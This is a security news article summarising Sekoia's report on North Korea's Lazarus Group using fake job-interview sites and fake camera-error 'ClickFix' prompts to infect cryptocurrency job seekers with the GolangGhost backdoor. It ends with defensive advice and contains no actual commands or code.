North Korean Hackers Adopt ClickFix Attacks to Target Crypto Firms
The notorious North Korean Lazarus hacking group has reportedly adopted a new tactic in its cyber attacks: the "ClickFix" method. This development, reported by Sekoia, is seen as an evolution of the threat actor's previous campaigns that target job seekers in the AI and cryptocurrency space.
ClickFix is a relatively new but increasingly common tactic used by threat actors to deploy malware. It involves using fake errors on websites or documents indicating a problem viewing the content. The page then prompts the user to "fix" the issue by running PowerShell commands that download and execute the malware on the system.
Lazarus Group Impersonates Well-Known Companies
The Lazarus group has impersonated numerous well-known companies in its latest campaign, including Coinbase, KuCoin, Kraken, Circle, Securitize, BlockFi, Tether, Robinhood, and Bybit. These companies are often used as a lure to trick victims into downloading and running malware.
Sekoia analyzed 184 different invitations retrieved from fake interview websites and found that 14 company names were used to lure the victim into completing the application process. This indicates that Lazarus is using these tactics to target job seekers in the cryptocurrency industry, particularly centralized finance (CeFi) companies.
ClickFake Campaigns
In February 2025, Sekoia reported that Lazarus started using "ClickFake" campaigns that employ ClickFix tactics. These attacks are different from its previous Contagious Interview campaign, which targeted developers and coders.
The ClickFake attacks involve inviting targets to a remote interview by following a link to a legitimate-appearing site built in ReactJS. The site features contact forms, open-ended questions, and a request for a video introduction. When the target attempts to record the video using their webcam, a fake error appears, claiming a driver issue is preventing camera access.
GolangGhost Malware
The victims are instructed to run a curl command in CMD (Windows) or Terminal (macOS), which infects them with a Go-based backdoor named "GolangGhost". This malware establishes persistence via registry modification and LaunchAgent plist files, and connects to its command and control (C2) server.
GolangGhost can perform file operations, shell command execution, steal Chrome cookies, browsing history, and stored passwords. It also harvests system metadata. The malware is highly versatile and can be used for various malicious purposes.
Prevention and Detection
As Lazarus diversifies its attack methods, potential targets must remain vigilant and stay up-to-date with the latest developments. Consistently verifying interview invitations before downloading or executing anything on their systems is crucial.
Sekoia has shared Yara rules that organizations can use to detect and block ClickFake activity in their environments, as well as a complete list of indicators of compromise associated with the latest Lazarus campaigns. By staying informed and taking proactive measures, individuals and organizations can reduce the risk of falling victim to these attacks.
Stay Informed and Stay Safe
Never execute anything you have copied from the internet on the Windows Command Prompt or macOS Terminal, especially if you don't fully understand what it does. By being cautious and informed, you can protect yourself against the latest Lazarus hacking campaigns.